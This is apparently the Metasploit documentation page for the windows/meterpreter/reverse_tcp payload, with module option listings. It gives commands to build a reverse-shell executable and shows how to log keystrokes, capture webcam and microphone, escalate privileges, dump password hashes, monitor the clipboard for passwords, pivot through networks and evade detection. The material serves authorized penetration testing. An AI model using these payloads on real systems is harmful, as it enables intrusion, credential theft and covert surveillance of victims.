Windows Meterpreter (Reflective Injection), Reverse TCP Stager - Metasploit

msf > use payload/windows/meterpreter/reverse_tcp
msf payload(reverse_tcp) > show options
    ... show and set options ...
msf payload(reverse_tcp) > generate

windows/meterpreter/reverse_tcp is one of the most powerful features the Metasploit Framework has to offer, and there are so many things you can do with it.

It allows you to remotely control the file system, sniff, keylog, hashdump, perform network pivoting, control the webcam and microphone, etc. It has the best support for post modules, and you can load extensions, such as mimikatz and python interpreter, etc.

windows/meterpreter/reverse_tcp is also the default payload for all Windows exploit targets.

Vulnerable Application

---

This Meterpreter payload is suitable for the following environments:

• Windows x64
• Windows x86

Verification Steps

---

windows/meterpreter/reverse_tcp is typically used in two different ways.

First, it is typically used as a payload for an exploit. Here's how to do that:

1. In msfconsole, select an exploit module
2. Configure the options for that exploit.
3. Do: set payload windows/meterpreter/reverse_tcp
4. Set the LHOST option, which is the IP that the payload should connect to.
5. Do: exploit. If the exploit is successful, it should execute that payload.

Another way to use windows/meterpreter/reverse_tcp is to generate it as an executable. Normally, you would want to do it with msfvenom. If you are old school, you have probably also heard of msfpayload and msfencode. msfvenom is a replacement of those.

The following is a basic example of using msfvenom to generate windows/meterpreter/reverse_tcp as an executable:

./msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f exe -o /tmp/payload.exe

Important Basic Commands

---

pwd command

The pwd command allows you to see the current directory you're in on the remote target. Example:

meterpreter > pwd
C:\Users\user\Desktop

cd command

The cd command allows you to change directories. Example:

meterpreter > cd C:\\
meterpreter > pwd
C:\

cat command

The cat command allows you to see the content of a file:

meterpreter > cat C:\\file.txt
Hello world!

upload command

The upload command allows you to upload a file to the remote target. For example:

meterpreter > upload /tmp/something.txt C:\\Users\\user\\Desktop\\something.txt
[*] uploading  : /tmp/something.txt -> C:\Users\user\Desktop\something.txt
[*] uploaded   : /tmp/something.txt -> C:\Users\user\Desktop\something.txt
meterpreter >

The -r option for the command also allows you to upload recursively.

download command

The download command allows you download a file from the remote target to your machine. For example:

meterpreter > download C:\\Users\\user\\Desktop\\something.txt /tmp/
[*] downloading: C:\Users\user\Desktop\something.txt -> /tmp//something.txt
[*] download   : C:\Users\user\Desktop\something.txt -> /tmp//something.txt
meterpreter >

The -r option for the command also allows you to download recursively.

search command

The search command allows you to find files on the remote file system. For example, this demonstrates how to find all text files in the current directory:

meterpreter > search -d . -f *.txt
Found 1 result...
    .\something.txt (5 bytes)

Note that without the -d option, the command will attempt to search in all drives.

The -r option for the commands allows you to search recursively.

ifconfig command

The ifconfig command displays the network interfaces on the remote machine:

meterpreter > ifconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
...

The command ipconfig is an alias for ifconfig.

getuid command

The getuid command shows you the current user that the payload is running as:

meterpreter > getuid
Server username: WIN-6NH0Q8CJQVM\user

execute command

The execute command allows you to execute a command or file on the remote machine.

The following example will spawn a calculator:

meterpreter > execute -f calc.exe
Process 2076 created.

To pass an argument, use the -a flag:

meterpreter > execute -f iexplore.exe -a https://metasploit.com
Process 2016 created.

There are some options you can see to add more stealth. For example, you can use the -H flag to create the process hidden from view. You can also use the -m flag to execute from memory.

ps command

The ps command lists the running processes on the remote machine.

shell command

The shell command allows you to interact with the remote machine's command prompt. Example:

meterpreter > shell
Process 3576 created.
Channel 6 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\user\Desktop>

To switch back to Meterpreter, do [CTRL]+[Z] to background the channel.

sysinfo command

The sysinfo command shows you basic information about the remote machine. Example:

meterpreter > sysinfo
Computer        : WIN-6NH0Q8CJQVM
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >

keyscan_start

The keyscan_start command starts the keylogging feature on the remote machine.

keyscan_dump

The keyscan_dump command is a keylogger feature. You must use the keyscan_start command before using this. Example:

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
Hello World!!

If you wish to stop sniffing, use the keyscan_stop command.

keyscan_stop

The keyscan_stop command stops the keylogger.

screenshot

The screenshot command takes a screenshot of the target machine.

webcam_list

The webcam_list commands shows you a list of webcams that you can control. You'll probably want to use this first before using any other webcam commands.

webcam_snap

The webcam_snap commands uses the selected webcam to take a picture.

webcam_stream

The webcam_stream command basically uses the webcam_snap command repeatedly to create the streaming effect. There is no sound.

record_mic

The record_mic command captures audio on the remote machine.

getsystem

The getsystem command attempts to elevate your privilege on the remote machine with one of these techniques:

• Named pipe impersonation (in memory)
• Named pipe impersonation (dropper)
• Token duplication (in memory)

Example:

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

hashdump

The hashdump commands allows you to dump the Windows hashes if there are the right privileges. For example:

meterpreter > hashdump
Administrator:500:e39baff0f2c5fd4e93e28745b8bf4ba6:f4974ee4a935ee160a927eafbb3f317f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:92a84e332fa4b09e9850257ad6826566:8fb9a6e155fd6e14a16c37427b68bbb4:::
root:1003:633c097a37b26c0caad3b435b51404ee:f2477a144dff4f216ab81f2ac3e3207d:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:e09fcdea29d93203c925b205640421f2:::

Scenarios

---

Setting up for Testing

For testing purposes, if you don't want to manually generate a payload and start a multi handler repeatedly, you can use the auto_win32_multihandler.rc resource script in Metasploit to automate that process. Here's how you would use it:

First, run the resource script:

$ ./msfconsole -q -r scripts/resource/auto_win32_multihandler.rc
[*] Processing scripts/resource/auto_win32_multihandler.rc for ERB directives.
[*] resource (scripts/resource/auto_win32_multihandler.rc)> Ruby Code (776 bytes)
lhost => 192.168.1.199
lport => 4444
[*] Writing 73802 bytes to /Users/metasploit/.msf4/local/meterpreter_reverse_tcp.exe...
[*] windows/meterpreter/reverse_tcp's LHOST=192.168.1.199, LPORT=4444
[*] windows/meterpreter/reverse_tcp is at /Users/metasploit/.msf4/local/meterpreter_reverse_tcp.exe
payload => windows/meterpreter/reverse_tcp
lhost => 192.168.1.199
lport => 4444
exitonsession => false
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.199:4444
[*] Starting the payload handler...
msf exploit(handler) >

Next, go to your ~/.msf4/local directory, you should see meterpreter_reverse_tcp.exe in there. Upload that payload to your test box and execute it. You should receive a connection.

Using a Post Module

One of the best things about Meterpreter is you have access to a variety of post exploitation modules, specifically for the multi and Windows categories. Post modules provide you with more capabilities to collect data from the remote machine automatically. For example, you can steal passwords from popular applications and enumerate or modify system settings.

To use a post module from the Meterpreter prompt, simply use the run command:

meterpreter > run post/windows/gather/checkvm

[*] Checking if WIN-6NH0Q8CJQVM is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter >

It is also possible to run a post module via multiple Meterpreter sessions. To learn how, load the specific post module you wish to run, and enter info -d to see the basic usage in the documentation.

Using the extapi Extension

The main purpose of the extapi extension is to perform advanced enumeration of the target machine. For example, you can enumerate things like registered services, open windows, clipboard, ADSI, WMI queries, etc.

To begin, at the Meterpreter prompt, do:

meterpreter > load extapi
Loading extension extapi...success.
meterpreter >

One great feature of the extension is clipboard management. The Windows clipboard is interesting because it can store anything that is sensitive, such as files, user names, and passwords, but it is not well protected.

For example, a password manager is a popular tool to store encryped passwords. It allows the user to create complex passwords without the need to memorize any of them. All the user needs to do is open the password manager, retrieve the password for a particular account by copying it, and then paste it on a login page.

There is a security problem to the above process. When the user copies the password, it is stored in the operating system's clipboard. As an attacker, you can take advantage of this by starting the clipboard monitor from Meterpreter/extapi, and then collect whatever the user copies.

To read whatever is currently stored in the target's clipboard, you can use the clipboard_get_data commnad:

meterpreter > clipboard_get_data
Text captured at 2016-03-05 19:13:39.0170
=========================================
hello, world!!
=========================================

meterpreter >

The limitation of this command is that since you're only grabbing whatever is in the clipboard at the time, there is only one item to collect. However, when you start a monitor, you can collect whatever goes in there. To start, issue the following command:

meterpreter > clipboard_monitor_start
[+] Clipboard monitor started
meterpreter >

While it is monitoring, you can ask Meterpreter to dump whatever's been captured.

meterpreter > clipboard_monitor_dump
Text captured at 2016-03-05 19:18:18.0466
=========================================
this is fun.
=========================================

Files captured at 2016-03-05 19:20:07.0525
==========================================
Remote Path : C:\Users\user\Desktop\cat_pic.png
File size   : 37627 bytes
downloading : C:\Users\user\Desktop\cat_pic.png -> ./cat_pic.png
download    : C:\Users\user\Desktop\cat_pic.png -> ./cat_pic.png

==========================================

[+] Clipboard monitor dumped
meterpreter >

The clipboard_monitor_stop command will also dump the captured data, and then exit.

Combined with Meterpreter's keylogger, you have a very effective setup to capture the user's inputs.

Using the Python Extension

The Python extension allows you to use the remote machine's Python interpreter.

To load the extension, at the Meterpreter prompt, do:

meterpreter > use python
Loading extension python...success.

The most basic example of using the interpreter is the python_execute command:

meterpreter > python_execute "x = 'hello world'; print x"
[+] Content written to stdout:
hello world

meterpreter >

Another way to execute Python code is from a local file by using the python_import command.

To do this, first prepare for a Python script. This example should create a message.txt on the remote machine's desktop:

import os

user_profile = os.environ['USERPROFILE']

f = open(user_profile + '\\Desktop\\message.txt', 'w+')
f.write('hello world!')
f.close()

And to run that with the command:

meterpreter > python_import -f /tmp/test.py
[*] Importing /tmp/test.py ...
[+] Command executed without returning a result
meterpreter >

To learn more about the Python extension, please read this wiki.

Network Pivoting

There are three mains ways that you can use for moving around inside a network:

• The route command in the msf prompt
• The route command in the the Meterpreter prompt
• The portfwd command

Routing through msfconsole

The route command from the msf prompt allows you connect to hosts on a different network through the compromised machine. You should be able to determine that by looking at the compromised machine's ipconfig:

[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.201:49182) at 2016-03-04 20:35:31 -0600

meterpreter > ipconfig
...
Interface 10
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:86:4b:0d
MTU          : 1472
IPv4 Address : 192.168.1.201
IPv4 Netmask : 255.255.255.0
IPv6 Address : 2602:30a:2c51:e660::20
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
IPv6 Address : 2602:30a:2c51:e660:44a:576e:3d2c:d765
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : 2602:30a:2c51:e660:94be:567f:4fe7:5da7
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
IPv6 Address : fe80::44a:576e:3d2c:d765
IPv6 Netmask : ffff:ffff:ffff:ffff::

...

Interface 26
============
Name         : VPN
Hardware MAC : 00:00:00:00:00:00
MTU          : 1400
IPv4 Address : 192.100.0.100
IPv4 Netmask : 255.255.255.255

...

The example above shows that we have a Meterpreter connection to 192.168.1.201. Let's call this box A, and it is connected to the 192.100.0.0/24 VPN network. As an attacker, we aren't connected to this network directly, but we can explore that network through box A.

At the msf prompt, do:

msf exploit(handler) > route add 192.100.0.0 255.255.255.0 1
[*] Route added

The 1 at the end of the route indicates the session ID, the payload that is used as a gateway to talk to other machines.

So right now, we have a connection established to the VPN, and we should be able to connect to another machine from that network:

msf auxiliary(smb_version) > run

[*] 192.100.0.101:445     - 192.100.0.101:445 is running Windows 2003 SP2 (build:3790) (name:SINN3R-QIXN9TA2) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_version) >

Another neat trick using route is that you can also bypass the compromised host's firewall this way. For example, if the host has HTTP open, but SMB is blocked by the firewall, you can try to compromise it via HTTP first. You'll need to use the route command to talk to SMB and then try to exploit SMB.

Routing through Meterpreter

The route command in Meterpreter allows you change the routing table that is on the target machine. The way it needs to be configured is similar to the route command in msfconsole.

Routing through the portfwd command

The portfwd command allows you to talk to a remote service like it's local. For example, if you are able to compromise a host via SMB, but are not able to connect to the remote desktop service, then you can do:

meterpreter > portfwd add -l 3389 -p 3389 -r [Target Host]

And that should allow you to connect to remote desktop this way on the attacker's box:

rdesktop 127.0.0.1

Meterpreter Paranoid Mode

The paranoid mode forces the handler to be strict about which Meterpreter should be connecting to it, hence the name "paranoid mode".

To learn more about this feature, please click here.

Meterpreter Reliable Network Communication

Exiting Metasploit using exit -y no longer terminates the payload session like it used to. Instead, it will continue to run behind the scenes, attempting to connect back to Metasploit when an appropriate handler is available. If you wish to exit the session, make sure to sessions -K first.

To learn more about this feature, please click here.

Meterpreter Sleep Control

The sleep mode allows the payload on the target machine to be quiet for awhile, mainly in order to avoid suspicious active communication. It also provides better efficiency.

It is very simple to use. At the Meterpreter prompt, simply do:

meterpreter > sleep 20

And that will allow Meterpreter to sleep 20 seconds, and will reconnect as long as the payload handler remains active (such as being a background job).

To learn more about this feature, please click here.

Meterpreter Stageless Mode

A stageless Meterpreter allows a more economical way to deliver the payload, for cases where a normal one would actually cost too much time and bandwidth in a penetration test. To learn more about this, click on this to read more.

To use the stageless payload, use windows/meterpreter_reverse_tcp instead.

Meterpreter Timeout Control

The timeout control basically defines the life span of Meterpreter. To configure it, use the set_timeouts command:

meterpreter > set_timeouts
Usage: set_timeouts [options]

Set the current timeout options.
Any or all of these can be set at once.

OPTIONS:

    -c   Comms timeout (seconds)
    -h        Help menu
    -t   Retry total time (seconds)
    -w   Retry wait time (seconds)
    -x   Expiration timout (seconds)

To see the current timeout configuration, you can use the get_timeouts command:

meterpreter > get_timeouts
Session Expiry  : @ 2016-03-11 21:15:58
Comm Timeout    : 300 seconds
Retry Total Time: 3600 seconds
Retry Wait Time : 10 seconds

To learn more about timeout control, please go here.

Meterpreter Transport Control

Transport Control allows you manage transports on the fly while the payload session is still running. Meterpreter can automatically cycle through the transports when communication fails, or you can do it manually.

To learn more about this, please read this documentation.

Using the Post Exploitation API in IRB

---

To enter IRB, do the following at the Meterpreter prompt:

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client

>>

The client object

The client object in Meterpreter's IRB allows you control or retrieve information about the host. For example, this demonstrates how to obtain the current privilege we're running the payload as:

>> client.sys.config.getuid

To explore the client object, there are a few tricks. For example, you can use the #inspect method to inspect it:

>> client.inspect

You can use the #methods method to see what methods you can use:

>> client.methods

To find the source of the method, you can use the #source_location method. For example, say I want to find the source code for the #getuid method:

>> client.sys.config.method(:getuid).source_location
=> ["/Users/user/rapid7/msf/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb", 32]

The first element of the array is the location of the file. The second element is the line number of the method.

Using Railgun

Railgun allows you to use the remote machine's Windows API in Ruby. For example, to create a MessageBox on the target machine, do:

>> client.railgun.user32.MessageBoxA(0, "hello, world", "hello", "MB_OK")
=> {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>1}

To learn more about using Railgun, please read this wiki.

msf6 > use payload/windows/meterpreter/reverse_tcp

msf6 payload(windows/meterpreter/reverse_tcp) > show info

       Name: Windows Meterpreter (Reflective Injection), Reverse TCP Stager
     Module: payload/windows/meterpreter/reverse_tcp
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 296
       Rank: Normal

Provided by:
  skape <[email protected]>
  sf <[email protected]>
  OJ Reeves
  hdm <[email protected]>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST                      yes       The listen address (an interface may be specified)
LPORT     4444             yes       The listen port

Description:
  Inject the Meterpreter server DLL via the Reflective Dll Injection 
  payload (staged). Requires Windows XP SP2 or newer. Connect back to 
  the attacker

msf6 payload(windows/meterpreter/reverse_tcp) > show options

Module options (payload/windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

msf6 payload(windows/meterpreter/reverse_tcp) > show advanced

Module advanced options (payload/windows/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadBindPort                               no        Port to bind reverse tcp socket to on target system.
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependMigrate               false            yes       Spawns and runs shellcode in new process
   PrependMigrateProc                            no        Process to spawn and run shellcode in
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module